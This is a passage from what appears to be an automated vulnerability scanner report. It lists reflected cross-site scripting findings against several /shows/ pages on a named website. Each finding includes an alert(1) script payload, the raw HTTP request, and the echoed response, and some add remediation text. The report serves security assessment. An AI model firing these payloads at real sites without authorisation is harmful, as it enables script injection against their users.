This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/AT9be04'><script>alert(1)</script>43f8c6292e2 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=ee4acbcf205d38f8c695616e3a019909; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ee4acbcf205d38f8c695616e3a019909=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50376

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/shows/AT9be04'><script>alert(1)</script>43f8c6292e2' />
...[SNIP]...

1.92. http://www.butterscotch.com/shows/AT [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/AT

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30613"-alert(1)-"94f0bdba78e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shows/AT30613"-alert(1)-"94f0bdba78e HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:13 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=1771e39f97e82be5a5c155fe5c62274c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 1771e39f97e82be5a5c155fe5c62274c=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50279

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<script>
WS_AJAX = "http://www.butterscotch.com/includes/ajax/";

   loggedIn    = false;
   

topTab = 'sho';
url = "http://www.butterscotch.com/shows/AT30613"-alert(1)-"94f0bdba78e";

</script>
...[SNIP]...

1.93. http://www.butterscotch.com/shows/AT [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/AT

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 259d1"><script>alert(1)</script>966a5ade193 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/AT259d1"><script>alert(1)</script>966a5ade193 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=b38aa8055bf37effd925e13cec8e7d9d; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: b38aa8055bf37effd925e13cec8e7d9d=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50494

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type=hidden name=ref value="http://www.butterscotch.com/shows/AT259d1"><script>alert(1)</script>966a5ade193" />
...[SNIP]...

1.94. http://www.butterscotch.com/shows/Lab-Rats [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Lab-Rats

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1cdff'><script>alert(1)</script>7fc59e7282f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/Lab-Rats1cdff'><script>alert(1)</script>7fc59e7282f HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:15 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=f83e5edc74f32490e6d7c846e45b30e4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f83e5edc74f32490e6d7c846e45b30e4=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50417

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/shows/Lab-Rats1cdff'><script>alert(1)</script>7fc59e7282f' />
...[SNIP]...

1.95. http://www.butterscotch.com/shows/Lab-Rats [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Lab-Rats

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f862"-alert(1)-"b0c5dfc94b0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shows/Lab-Rats2f862"-alert(1)-"b0c5dfc94b0 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:21 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=e7f613b15848092e6b01b527ee3f9a12; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: e7f613b15848092e6b01b527ee3f9a12=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50381

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<script>
WS_AJAX = "http://www.butterscotch.com/includes/ajax/";

   loggedIn    = false;
   

topTab = 'sho';
url = "http://www.butterscotch.com/shows/Lab-Rats2f862"-alert(1)-"b0c5dfc94b0";

</script>
...[SNIP]...

1.96. http://www.butterscotch.com/shows/Lab-Rats [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Lab-Rats

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 605d2"><script>alert(1)</script>0f550289d8e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/Lab-Rats605d2"><script>alert(1)</script>0f550289d8e HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:08 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4cbfaeec7ed123668b3a45cda4a1424b; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4cbfaeec7ed123668b3a45cda4a1424b=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50560

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type=hidden name=ref value="http://www.butterscotch.com/shows/Lab-Rats605d2"><script>alert(1)</script>0f550289d8e" />
...[SNIP]...

1.97. http://www.butterscotch.com/shows/Miss-Download [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Miss-Download

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 86263'><script>alert(1)</script>484a3c8edc8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/Miss-Download86263'><script>alert(1)</script>484a3c8edc8 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=ccd093b6fe737b0f8d76bc785a9d9d9f; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ccd093b6fe737b0f8d76bc785a9d9d9f=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50632

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/shows/Miss-Download86263'><script>alert(1)</script>484a3c8edc8' />
...[SNIP]...

1.98. http://www.butterscotch.com/shows/Miss-Download [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Miss-Download

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26605"-alert(1)-"689bed10a7d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shows/Miss-Download26605"-alert(1)-"689bed10a7d HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=41305656fdf4b89151e629d558c5966a; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 41305656fdf4b89151e629d558c5966a=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50648

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<script>
WS_AJAX = "http://www.butterscotch.com/includes/ajax/";

   loggedIn    = false;
   

topTab = 'sho';
url = "http://www.butterscotch.com/shows/Miss-Download26605"-alert(1)-"689bed10a7d";

</script>
...[SNIP]...

1.99. http://www.butterscotch.com/shows/Miss-Download [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Miss-Download

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ddabd"><script>alert(1)</script>d590b6c1636 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/Miss-Downloadddabd"><script>alert(1)</script>d590b6c1636 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=9135b2838d5782046085771f61f8a4c8; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 9135b2838d5782046085771f61f8a4c8=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50632

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type=hidden name=ref value="http://www.butterscotch.com/shows/Miss-Downloadddabd"><script>alert(1)</script>d590b6c1636" />
...[SNIP]...

1.100. http://www.butterscotch.com/shows/Mr-Mobile [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Mr-Mobile

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b7b6d'><script>alert(1)</script>031da9bdfb8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/Mr-Mobileb7b6d'><script>alert(1)</script>031da9bdfb8 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=ae2fcd6fdc468bd08f7f3e164698ee04; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ae2fcd6fdc468bd08f7f3e164698ee04=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50437

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type='hidden' name='ref' value='/shows/Mr-Mobileb7b6d'><script>alert(1)</script>031da9bdfb8' />
...[SNIP]...

1.101. http://www.butterscotch.com/shows/Mr-Mobile [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Mr-Mobile

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfea8"-alert(1)-"554ac61bd4e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shows/Mr-Mobilebfea8"-alert(1)-"554ac61bd4e HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=4ec4e58dabe0a58f5b01a43ede0e3cd4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 4ec4e58dabe0a58f5b01a43ede0e3cd4=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50507

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<script>
WS_AJAX = "http://www.butterscotch.com/includes/ajax/";

   loggedIn    = false;
   

topTab = 'sho';
url = "http://www.butterscotch.com/shows/Mr-Mobilebfea8"-alert(1)-"554ac61bd4e";

</script>
...[SNIP]...

1.102. http://www.butterscotch.com/shows/Mr-Mobile [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/Mr-Mobile

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49459"><script>alert(1)</script>6537b84f503 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/Mr-Mobile49459"><script>alert(1)</script>6537b84f503 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:04 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=0bd061f798757be20d5c10cb889c32c0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 0bd061f798757be20d5c10cb889c32c0=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50452

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<input type=hidden name=ref value="http://www.butterscotch.com/shows/Mr-Mobile49459"><script>alert(1)</script>6537b84f503" />
...[SNIP]...

1.103. http://www.butterscotch.com/shows/On-Deck [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/On-Deck

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7ab27"-alert(1)-"9bc82b719cd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /shows/On-Deck7ab27"-alert(1)-"9bc82b719cd HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 21:49:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Set-Cookie: PHPSESSID=70c896269b3f0eef2dff476cbdc7ddf4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 70c896269b3f0eef2dff476cbdc7ddf4=K00OTdKXB13YSKizkxmBPX%2FjcO3OTZnDILYwPlANhPW%2F57zhUMCXC5uDVX541cs%2B5LF76WvadMIAdqWyz6%2BJp8rhQGOGHhIe%2BiYSOqbuPtOoDEqSYYyovcVfqJx1yFza1%2BwJqg08p1HufvW8uO2eTPlkLTo72thgXWXY3eQGU0AHw8Zx4mVxTPlkLTo72thg9D23B%2BPQe%2B8YvVHbkfCPUODbi%2FURJS2QiFUamnt1siAQsiftGd%2BatIn%2FcVvtvFn13c4MLsvit2LH6z0SThmcTQ%3D%3D; path=/
Connection: close
Content-Type: text/html
Content-Length: 50380

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Date()).getTime()</script>
...[SNIP]...
<script>
WS_AJAX = "http://www.butterscotch.com/includes/ajax/";

   loggedIn    = false;
   

topTab = 'sho';
url = "http://www.butterscotch.com/shows/On-Deck7ab27"-alert(1)-"9bc82b719cd";

</script>
...[SNIP]...

1.104. http://www.butterscotch.com/shows/On-Deck [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.butterscotch.com
Path:   /shows/On-Deck

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d5fe3'><script>alert(1)</script>2aec528306 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /shows/On-Deckd5fe3'><script>alert(1)</script>2aec528306 HTTP/1.1
Host: www.butterscotch.com
Accept: */*
Accept-Language: en
